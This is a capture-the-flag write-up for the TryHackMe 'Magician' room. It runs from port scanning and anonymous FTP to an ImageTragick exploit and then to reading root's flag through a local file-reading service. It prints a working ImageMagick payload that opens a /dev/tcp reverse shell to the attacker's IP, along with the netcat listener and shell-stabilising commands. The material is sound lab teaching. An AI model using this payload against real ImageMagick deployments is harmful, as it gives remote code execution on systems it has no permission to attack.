TryHackMe: Magician by M0N573R777 & ripcurlz

Note: this machine needs about 7 minutes to start up, please be patient :)

Please add the IP address of this machine with the hostname "magician" to your /etc/hosts file on Linux before you start.
On Windows, the hosts file should be at C:\Windows\System32\drivers\etc\hosts.

Use the hostname instead of the IP address if you want to upload a file. This is required for the room to work correctly ;)

Have fun and use your magic skills!

Enumeration

Ok, as per above let's add magician to our /etc/hosts and run rustscan

╰─⠠⠵ rustscan -a magician --ulimit 10000 -- -sC -sV -A -oA magician
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.126.74:21
Open 10.10.126.74:8080
Open 10.10.126.74:8081
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-29 02:06 BST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Initiating Ping Scan at 02:06
Scanning 10.10.126.74 [2 ports]
Completed Ping Scan at 02:06, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 02:06
Scanning magician (10.10.126.74) [3 ports]
Discovered open port 21/tcp on 10.10.126.74
Discovered open port 8080/tcp on 10.10.126.74
Discovered open port 8081/tcp on 10.10.126.74
Completed Connect Scan at 02:06, 0.03s elapsed (3 total ports)
Initiating Service scan at 02:06
Scanning 3 services on magician (10.10.126.74)
Completed Service scan at 02:06, 13.54s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.126.74.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:07, 14.82s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.15s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.00s elapsed
Nmap scan report for magician (10.10.126.74)
Host is up, received conn-refused (0.032s latency).
Scanned at 2021-03-29 02:06:36 BST for 29s

PORT     STATE SERVICE    REASON  VERSION
21/tcp   open  ftp        syn-ack vsftpd 2.0.8 or later
8080/tcp open  http-proxy syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Mon, 29 Mar 2021 01:06:43 GMT
|     Connection: close
|     {"timestamp":"2021-03-29T01:06:43.677+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Mon, 29 Mar 2021 01:06:43 GMT
|     Connection: close
|     {"timestamp":"2021-03-29T01:06:43.298+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Mon, 29 Mar 2021 01:06:43 GMT
|     Connection: close
|     {"timestamp":"2021-03-29T01:06:43.497+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 505 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 465
|     Date: Mon, 29 Mar 2021 01:06:43 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505 
|     HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 
|_    HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open  http       syn-ack nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: CA4D0E532A1010F93901DFCB3A9FC682
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=3/29%Time=60612823%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,13B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Acces
SF:s-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers\r\n
SF:Content-Type:\x20application/json\r\nDate:\x20Mon,\x2029\x20Mar\x202021
SF:\x2001:06:43\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"202
SF:1-03-29T01:06:43\.298\+0000\",\"status\":404,\"error\":\"Not\x20Found\"
SF:,\"message\":\"No\x20message\x20available\",\"path\":\"/\"}")%r(HTTPOpt
SF:ions,13B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Co
SF:ntrol-Request-Method\r\nVary:\x20Access-Control-Request-Headers\r\nCont
SF:ent-Type:\x20application/json\r\nDate:\x20Mon,\x2029\x20Mar\x202021\x20
SF:01:06:43\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"2021-03
SF:-29T01:06:43\.497\+0000\",\"status\":404,\"error\":\"Not\x20Found\",\"m
SF:essage\":\"No\x20message\x20available\",\"path\":\"/\"}")%r(RTSPRequest
SF:,259,"HTTP/1\.1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\
SF:r\nContent-Language:\x20en\r\nContent-Length:\x20465\r\nDate:\x20Mon,\x
SF:2029\x20Mar\x202021\x2001:06:43\x20GMT\r\n\r\n<!doctype\x20html><html\x
SF:20lang=\"en\"><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTT
SF:P\x20Version\x20Not\x20Supported</title><style\x20type=\"text/css\">bod
SF:y\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x
SF:20{color:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x2
SF:0h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:
SF:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color
SF::#525D76;border:none;}</style></head><body><h1>HTTP\x20Status\x20505\x2
SF:0\xe2\x80\x93\x20HTTP\x20Version\x20Not\x20Supported</h1></body></html>
SF:")%r(FourOhFourRequest,15E,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\n
SF:Vary:\x20Access-Control-Request-Method\r\nVary:\x20Access-Control-Reque
SF:st-Headers\r\nContent-Type:\x20application/json\r\nDate:\x20Mon,\x2029\
SF:x20Mar\x202021\x2001:06:43\x20GMT\r\nConnection:\x20close\r\n\r\n{\"tim
SF:estamp\":\"2021-03-29T01:06:43\.677\+0000\",\"status\":404,\"error\":\"
SF:Not\x20Found\",\"message\":\"No\x20message\x20available\",\"path\":\"/n
SF:ice%20ports%2C/Tri%6Eity\.txt%2ebak\"}");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.03 seconds

21/ftp

╰─⠠⠵ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:tony): anonymous
331 Please specify the password.
Password:

230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> 
ftp> 

8080/http

8081/http

user.txt

Since we know the CVE we need to use we can grab imagetragik1_payload_imageover_reverse_shell_devtcp.jpg from PayLoadAllThings and change the IP/Port as required.

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/10.9.0.7/4444 0<&1 2>&1'
pop graphic-context
pop graphic-context

Once we start our listener nc -lvnp 4444 and upload the image we get a shell back.

╰─⠠⠵ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.126.74 51174
sh: cannot set terminal process group (975): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ id
id
uid=1000(magician) gid=1000(magician) groups=1000(magician)

From here we can change to magician home directory and read user.txt

cd /home/magician
cat user.txt
THM{[REDACTED]}

Answer: THM{[REDACTED]}

root.txt

Now we have our user.txt we need to PrivEsc to read out root.txt. First we need to get a better shell.

sh-4.4$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
magician@magician:~$ export TERM=xterm
export TERM=xterm
magician@magician:~$ ^Z
[1]  + 37754 suspended  nc -lvnp 4444

╰─⠠⠵ stty raw -echo; fg                                                                

[1]  + 37754 continued  nc -lvnp 4444

magician@magician:~$ 
magician@magician:~$ 

Now we have a stable shell we can test sudo -l, unfortunately we need the password sof the magician account

magician@magician:~$ sudo -l
[sudo] password for magician: 

Looking in the folder we see another note

magician@magician:~$ cat the_magic_continues 
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.

Looking at netstat we can see :6666 locally

magician@magician:~$ netstat -anp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -                   
tcp        0    284 10.10.126.74:51174      10.9.0.7:4444           ESTABLISHED 1425/sh             
tcp6       0      0 :::8080                 :::*                    LISTEN      975/java            
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 10.10.126.74:8080       10.9.0.7:49564          ESTABLISHED 975/java            
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 10.10.126.74:68         0.0.0.0:*                           -                   
raw6       0      0 :::58                   :::*                    7           -                   
Active UNIX domain sockets (servers and established)

Using curl on this port we get

<!DOCTYPE html>
<html>
  <head>
    <title>The Magic cat</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
  </head>
  <body>
<div class="navbar navbar-inverse" role="navigation">
    <div class="container">
        <div class="navbar-header">            
            <a class="navbar-brand" href="/">The Magic cat</a>
        </div>        
    </div>
</div>
<div class="container">
<form action="" method="post"
  class="form" role="form">
<div class="form-group "><label class="control-label" for="filename">Enter filename</label>
        
          <input class="form-control" id="filename" name="filename" type="text" value="">
  </div>
    <input class="btn btn-default" id="submit" name="submit" type="submit" value="Submit">
</form>
<div>
    <span>
        <pre class="page-header">
        ░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄░░░░░░░
        ░░░░░█░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░▀▀▄░░░░
        ░░░░█░░░▒▒▒▒▒▒░░░░░░░░▒▒▒░░█░░░
        ░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█░░
        ░▄▀▒▄▄▄▒░█▀▀▀▀▄▄█░░░██▄▄█░░░░█░
        █░▒█▒▄░▀▄▄▄▀░░░░░░░░█░░░▒▒▒▒▒░█
        █░▒█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄▒█
        ░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█░
        ░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█░░
        ░░░█░░░░██░░▀█▄▄▄█▄▄█▄████░█░░░
        ░░░░█░░░░▀▀▄░█░░░█░█▀██████░█░░
        ░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█░░
        ░░░░░░░▀▄▄░▒▒▒▒░░░░░░░░░░▒░░░█░
        ░░░░░░░░░░▀▀▄▄░▒▒▒▒▒▒▒▒▒▒░░░░█░
        ░░░░░░░░░░░░░░▀▄▄▄▄▄░░░░░░░░█░░
        </pre>
    </span>
</div>
</div>    
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
  </body>
</html>

I tried some port forwarding with meterpreter but didn't get anything working. Falling back to curl we can post something using filename as the input name.

Using test as filename we get

magician@magician:~$ curl -X POST http://127.0.0.1:6666 -d "filename=test"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

So let's try a file that exists /etc/passwd

magician@magician:~$ curl -X POST http://127.0.0.1:6666 -d "filename=/etc/passwd"

This returns the /etc/passwd file but the content is encoded. Let's see if we can read /root/root.txt

curl -X POST http://127.0.0.1:6666 -d "filename=/root/root.txt"

Success we can read the file but it is encoded ..... keep running the command until you see a encoding you recognize and decode. I waited until I saw GUZ{ which looked like rot13

GUZ{[REDACTED]}

ROT13

THM{[REDACTED]}

Answer: THM{[REDACTED]}

Credits

This is a room by ripcurlz and ms.geeky. We hope you enjoyed it :)

Done

Another CVE room done, enjoyed learning about the CVE.